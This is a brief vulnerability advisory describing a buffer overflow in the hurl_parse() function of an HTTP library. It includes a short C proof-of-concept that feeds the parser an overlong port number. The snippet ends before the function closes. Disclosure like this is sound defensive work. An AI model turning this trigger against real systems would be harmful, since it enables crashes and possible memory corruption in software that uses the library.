CSECA-07001 - Buffer overflow in hurl_parse()

The TCP port number is copied into a fixed size buffer before it is converted into an integer. Supplying a port number larger than the buffer size - 1 will cause the buffer to overflow.

Example Code

  #include <yoctohttp/common.h>

  #include <stdio.h>
  #include <string.h>

  int main(int argc, char **argv) {
    hurl_t hurl;
    char *url;

    url = strdup("http://localhost:12345678900123456789123456789001234567891234567890012345678912345678900123456789/");
    hurl_parse(&hurl, url);

    return 0;